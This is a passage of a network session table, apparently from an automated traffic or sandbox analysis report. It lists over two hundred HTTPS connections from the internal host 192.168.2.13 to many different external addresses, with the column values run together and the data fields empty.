                                    10351192.168.2.13428321.118.198.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10352192.168.2.133422617.17.246.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10353192.168.2.13537281.200.191.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10354192.168.2.134292682.101.93.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10355192.168.2.134716834.221.100.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10356192.168.2.134021076.36.119.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10357192.168.2.133434643.137.107.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10358192.168.2.135928612.5.213.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10359192.168.2.1341020165.144.15.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10360192.168.2.135342267.172.126.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10361192.168.2.1355188221.88.153.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10362192.168.2.1344950218.240.172.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10363192.168.2.133689877.59.34.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10364192.168.2.134794677.86.177.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10365192.168.2.1336658172.51.242.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10366192.168.2.1346722161.51.69.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10367192.168.2.1347850175.18.73.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10368192.168.2.1339576118.4.245.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10369192.168.2.134501239.196.48.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10370192.168.2.1342128141.241.0.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10371192.168.2.133754080.239.65.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10372192.168.2.1337404149.194.180.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10373192.168.2.135360239.9.93.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10374192.168.2.134539461.210.222.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10375192.168.2.133720076.165.214.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10376192.168.2.135867813.98.33.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10377192.168.2.1341830197.113.18.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10378192.168.2.1342856199.14.172.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10379192.168.2.1343844155.144.139.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10380192.168.2.135797684.228.179.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10381192.168.2.135877669.237.118.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10382192.168.2.134506239.161.155.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10383192.168.2.135486451.208.89.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10384192.168.2.134413431.121.209.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10385192.168.2.1354838174.230.121.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10386192.168.2.1360756108.230.179.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10387192.168.2.1341080196.93.6.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10388192.168.2.1347060167.147.5.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10389192.168.2.1334762162.191.153.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10390192.168.2.134688461.133.4.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10391192.168.2.1357062124.58.102.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10392192.168.2.134334082.184.201.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10393192.168.2.1354514191.139.128.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10394192.168.2.1335566193.17.148.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10395192.168.2.1359588130.146.210.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10396192.168.2.1338724144.68.74.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10397192.168.2.1359228109.243.139.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10398192.168.2.1345348213.236.218.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10399192.168.2.136047037.180.12.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10400192.168.2.1337852143.253.246.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10401192.168.2.1353142197.182.45.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10402192.168.2.134034253.22.69.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10403192.168.2.1355576148.96.22.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10404192.168.2.13582562.3.42.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10405192.168.2.134188234.244.66.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10406192.168.2.1344984218.24.27.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10407192.168.2.1344098189.102.137.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10408192.168.2.1333590160.4.202.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10409192.168.2.134807825.225.146.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10410192.168.2.133603246.151.254.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10411192.168.2.135768060.222.194.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10412192.168.2.134702480.116.125.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10413192.168.2.1343756124.46.121.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10414192.168.2.1355608136.54.42.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10415192.168.2.133860663.195.115.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10416192.168.2.1336720175.129.212.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10417192.168.2.1341988169.202.138.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10418192.168.2.1342484126.195.173.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10419192.168.2.1343316140.218.255.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10420192.168.2.1343272147.20.62.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10421192.168.2.1334254205.54.91.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10422192.168.2.1348840167.0.129.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10423192.168.2.1348196175.95.91.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10424192.168.2.135154451.24.147.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10425192.168.2.134445640.108.3.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10426192.168.2.133852280.10.206.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10427192.168.2.134758263.228.116.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10428192.168.2.134504648.0.24.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10429192.168.2.133933262.27.168.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10430192.168.2.133288858.174.125.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10431192.168.2.1334042142.124.79.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10432192.168.2.135523446.23.238.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10433192.168.2.1346682211.114.213.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10434192.168.2.134630887.235.188.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10435192.168.2.1356428121.90.25.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10436192.168.2.134211096.163.230.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10437192.168.2.134854870.201.224.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10438192.168.2.133883293.77.94.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10439192.168.2.134026279.149.0.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10440192.168.2.136056423.50.163.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10441192.168.2.134192841.30.249.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10442192.168.2.1353430133.104.80.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10443192.168.2.1343558100.192.214.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10444192.168.2.134369237.172.170.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10445192.168.2.136015486.109.132.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10446192.168.2.133851646.226.99.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10447192.168.2.1354368174.39.173.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10448192.168.2.1341338110.86.209.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10449192.168.2.1360340190.14.222.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10450192.168.2.135972645.141.127.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10451192.168.2.1342978106.183.20.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10452192.168.2.133671445.98.49.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10453192.168.2.135307084.201.44.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10454192.168.2.135616264.73.109.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10455192.168.2.135943635.35.171.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10456192.168.2.1341128133.12.72.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10457192.168.2.1358520116.172.68.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10458192.168.2.134816881.108.145.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10459192.168.2.135035653.229.31.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10460192.168.2.134213859.91.87.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10461192.168.2.133476614.108.37.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10462192.168.2.1333106102.158.67.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10463192.168.2.134087638.169.234.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10464192.168.2.1333418113.144.155.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10465192.168.2.1353364156.114.181.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10466192.168.2.1350756198.111.61.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10467192.168.2.1352398196.121.94.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10468192.168.2.135630659.134.228.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10469192.168.2.1343772109.34.161.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10470192.168.2.136017245.168.221.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10471192.168.2.133701682.46.241.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10472192.168.2.1333378141.178.46.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10473192.168.2.135358070.37.119.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10474192.168.2.135947844.41.139.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10475192.168.2.1342822190.221.235.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10476192.168.2.134543874.239.167.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10477192.168.2.135413671.65.171.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10478192.168.2.1359536220.218.179.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10479192.168.2.1360926165.137.187.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10480192.168.2.133823649.164.102.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10481192.168.2.1352964105.174.34.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10482192.168.2.1360854166.164.27.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10483192.168.2.1339122219.71.37.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10484192.168.2.133887890.169.123.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10485192.168.2.1355382213.1.133.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10486192.168.2.133444693.203.164.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10487192.168.2.1352644144.125.3.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10488192.168.2.134388847.113.115.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10489192.168.2.135604887.75.231.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10490192.168.2.134912827.108.114.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10491192.168.2.1336144114.30.71.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10492192.168.2.1344514134.191.253.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10493192.168.2.135395657.86.81.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10494192.168.2.135958039.218.233.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10495192.168.2.1345464171.31.14.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10496192.168.2.134593852.167.111.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10497192.168.2.1341694137.222.133.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10498192.168.2.1337242141.178.213.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10499192.168.2.133317489.224.30.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10500192.168.2.1354208191.110.70.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10501192.168.2.1344052204.89.219.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10502192.168.2.1341488197.222.247.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10503192.168.2.1334958221.145.158.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10504192.168.2.1334176162.143.252.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10505192.168.2.1335738103.14.225.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10506192.168.2.1353012106.150.145.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10507192.168.2.134816836.216.177.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10508192.168.2.1338424108.237.89.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10509192.168.2.135184479.70.176.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10510192.168.2.1356630210.86.24.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10511192.168.2.135342678.17.174.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10512192.168.2.1344856187.243.127.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10513192.168.2.1352112208.205.124.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10514192.168.2.134613887.197.33.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10515192.168.2.1336186198.66.17.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10516192.168.2.134735066.81.104.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10517192.168.2.1354894216.22.149.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10518192.168.2.1338740151.159.84.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10519192.168.2.1345640126.7.0.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10520192.168.2.135604219.213.128.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10521192.168.2.1333336105.129.162.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10522192.168.2.133920697.91.12.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10523192.168.2.135995685.148.156.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10524192.168.2.135898490.35.88.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10525192.168.2.1359396163.213.207.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10526192.168.2.1353390165.111.89.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10527192.168.2.1359698202.226.218.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10528192.168.2.1345172134.153.83.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10529192.168.2.1356454144.217.91.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10530192.168.2.1353878140.199.97.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10531192.168.2.1354694174.242.44.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10532192.168.2.135288852.171.239.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10533192.168.2.1342810219.173.138.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10534192.168.2.133996219.139.253.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10535192.168.2.135650850.249.83.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10536192.168.2.1354028207.45.147.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10537192.168.2.1352586173.147.15.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10538192.168.2.1353282212.66.182.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10539192.168.2.135848660.86.98.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10540192.168.2.133936098.158.45.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10541192.168.2.1338012178.13.65.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10542192.168.2.133993294.59.191.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10543192.168.2.1359572147.231.214.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10544192.168.2.133342286.203.206.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10545192.168.2.1358656219.63.221.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10546192.168.2.1338564178.202.29.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10547192.168.2.1357982149.87.11.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10548192.168.2.1332940147.245.128.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10549192.168.2.1346912111.87.32.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10550192.168.2.134028618.53.101.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10551192.168.2.135584891.117.240.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10552192.168.2.1347424121.237.194.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10553192.168.2.1332798149.47.183.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10554192.168.2.1333060107.167.111.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10555192.168.2.13472741.11.226.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10556192.168.2.133295885.203.204.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10557192.168.2.1349972139.100.123.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10558192.168.2.1358650184.187.126.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10559192.168.2.134421667.78.150.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10560192.168.2.13433649.126.254.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10561192.168.2.13597569.210.100.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10562192.168.2.1336170148.22.71.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10563192.168.2.1360088162.3.182.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10564192.168.2.136094476.137.24.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10565192.168.2.133719835.175.171.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10566192.168.2.1358292136.32.241.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10567192.168.2.1346570192.120.89.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10568192.168.2.136055679.241.15.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10569192.168.2.1358744172.234.208.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10570192.168.2.133563414.103.80.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10571192.168.2.133929258.130.116.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10572192.168.2.134931471.198.71.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
